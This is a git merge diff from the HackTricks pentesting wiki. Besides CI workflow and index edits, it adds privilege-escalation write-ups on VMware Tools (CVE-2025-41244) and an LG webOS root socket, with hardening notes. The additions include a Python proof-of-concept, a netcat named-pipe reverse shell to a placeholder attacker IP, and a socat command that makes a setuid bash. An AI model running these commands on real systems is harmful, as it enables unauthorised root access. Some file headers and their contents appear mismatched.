Merge branch 'master' into research_update_src_pentesting-web_regular-expression-denial-of-service-redos_20251001_082618

Author: carlospolop

.github/workflows/build_master.yml

@@ -67,13 +67,27 @@ jobs:
           export GH_TOKEN="$TOKEN"
 
           # Delete the release if it exists
-          if gh release view "$TAG" >/dev/null 2>&1; then
+          echo "Checking if release $TAG exists..."
+          if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
             echo "Release $TAG already exists, deleting it..."
-            gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
+            gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
+              echo "Failed to delete release, trying without cleanup-tag..."
+              gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
+                echo "Warning: Could not delete existing release, will try to recreate..."
+              }
+            }
+            sleep 2  # Give GitHub API a moment to process the deletion
+          else
+            echo "Release $TAG does not exist, proceeding with creation..."
           fi
           
-          # Create new release
-          gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
+          # Create new release (with force flag to overwrite if deletion failed)
+          gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
+            echo "Failed to create release, trying with force flag..."
+            gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
+            sleep 2
+            gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
+          }
 
 
       # Login in AWs

.github/workflows/translate_all.yml

@@ -106,7 +106,7 @@ jobs:
             fi
           done
 
-          echo "Files to translate:"
+          echo "Files to translate (`wc -l < /tmp/file_paths.txt`):"
           cat /tmp/file_paths.txt
           echo ""
           echo ""

resolve_searchindex_conflicts.sh

@@ -226,7 +226,7 @@ https://www.lasttowersolutions.com/
 
 ### [K8Studio - The Smarter GUI to Manage Kubernetes.](https://k8studio.io/)
 
-<figure><img src="images/k8studio.png" alt="k8studio logo"><figcaption></figcaption></figure>
+<figure><img src="images/k8studio.jpg" alt="k8studio logo"><figcaption></figcaption></figure>
 
 K8Studio IDE empowers DevOps, DevSecOps, and developers to manage, monitor, and secure Kubernetes clusters efficiently. Leverage our AI-driven insights, advanced security framework, and intuitive CloudMaps GUI to visualize your clusters, understand their state, and act with confidence.
 
@@ -253,3 +253,4 @@ welcome/hacktricks-values-and-faq.md
 
 {{#include ./banners/hacktricks-training.md}}
 
+

src/README.md

@@ -110,6 +110,7 @@
 - [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
 - [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
   - [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md)
+  - [Vmware Tools Service Discovery Untrusted Search Path Cve 2025 41244](linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md)
   - [Arbitrary File Write to Root](linux-hardening/privilege-escalation/write-to-root.md)
   - [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
   - [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)
@@ -949,4 +950,4 @@
 - [Stealing Sensitive Information Disclosure from a Web](todo/stealing-sensitive-information-disclosure-from-a-web.md)
 - [Post Exploitation](todo/post-exploitation.md)
 - [Investment Terms](todo/investment-terms.md)
-- [Cookies Policy](todo/cookies-policy.md)
+- [Cookies Policy](todo/cookies-policy.md)

src/SUMMARY.md

@@ -124,3 +124,4 @@ Guidance: Treat survivors that affect value transfers, accounting, or access con
 - [Slither (GitHub)](https://github.com/crytic/slither)
 
 {{#include ../../banners/hacktricks-training.md}}
+

src/blockchain/smart-contract-security/mutation-testing-with-slither.md

@@ -1723,6 +1723,16 @@ Android rooting frameworks commonly hook a syscall to expose privileged kernel f
 android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 {{#endref}}
 
+## VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244)
+
+Regex-driven service discovery in VMware Tools/Aria Operations can extract a binary path from process command lines and execute it with -v under a privileged context. Permissive patterns (e.g., using \S) may match attacker-staged listeners in writable locations (e.g., /tmp/httpd), leading to execution as root (CWE-426 Untrusted Search Path).
+
+Learn more and see a generalized pattern applicable to other discovery/monitoring stacks here:
+
+{{#ref}}
+vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
+{{#endref}}
+
 ## Kernel Security Protections
 
 - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check)
@@ -1774,4 +1784,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 - [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
 - [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 
+- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
+
 {{#include ../../banners/hacktricks-training.md}}
+

src/linux-hardening/privilege-escalation/README.md

@@ -43,7 +43,47 @@ unix  2      [ ACC ]     STREAM     LISTENING     901181   132748/python
 echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
 ```
 
+## Case study: Root-owned UNIX socket signal-triggered escalation (LG webOS)
+
+Some privileged daemons expose a root-owned UNIX socket that accepts untrusted input and couples privileged actions to thread-IDs and signals. If the protocol lets an unprivileged client influence which native thread is targeted, you may be able to trigger a privileged code path and escalate.
+
+Observed pattern:
+- Connect to a root-owned socket (e.g., /tmp/remotelogger).
+- Create a thread and obtain its native thread id (TID).
+- Send the TID (packed) plus padding as a request; receive an acknowledgement.
+- Deliver a specific signal to that TID to trigger the privileged behaviour.
+
+Minimal PoC sketch:
+
+```python
+import socket, struct, os, threading, time
+# Spawn a thread so we have a TID we can signal
+th = threading.Thread(target=time.sleep, args=(600,)); th.start()
+ tid = th.native_id  # Python >=3.8
+s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+s.connect("/tmp/remotelogger")
+s.sendall(struct.pack('<L', tid) + b'A'*0x80)
+s.recv(4)  # sync
+os.kill(tid, 4)  # deliver SIGILL (example from the case)
+```
+
+To turn this into a root shell, a simple named-pipe + nc pattern can be used:
+
+```bash
+rm -f /tmp/f; mkfifo /tmp/f
+cat /tmp/f | /bin/sh -i 2>&1 | nc <ATTACKER-IP> 23231 > /tmp/f
+```
+
+Notes:
+- This class of bugs arises from trusting values derived from unprivileged client state (TIDs) and binding them to privileged signal handlers or logic.
+- Harden by enforcing credentials on the socket, validating message formats, and decoupling privileged operations from externally supplied thread identifiers.
+
+## References
+
+- [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/)
+
 {{#include ../../banners/hacktricks-training.md}}
 
 
 
+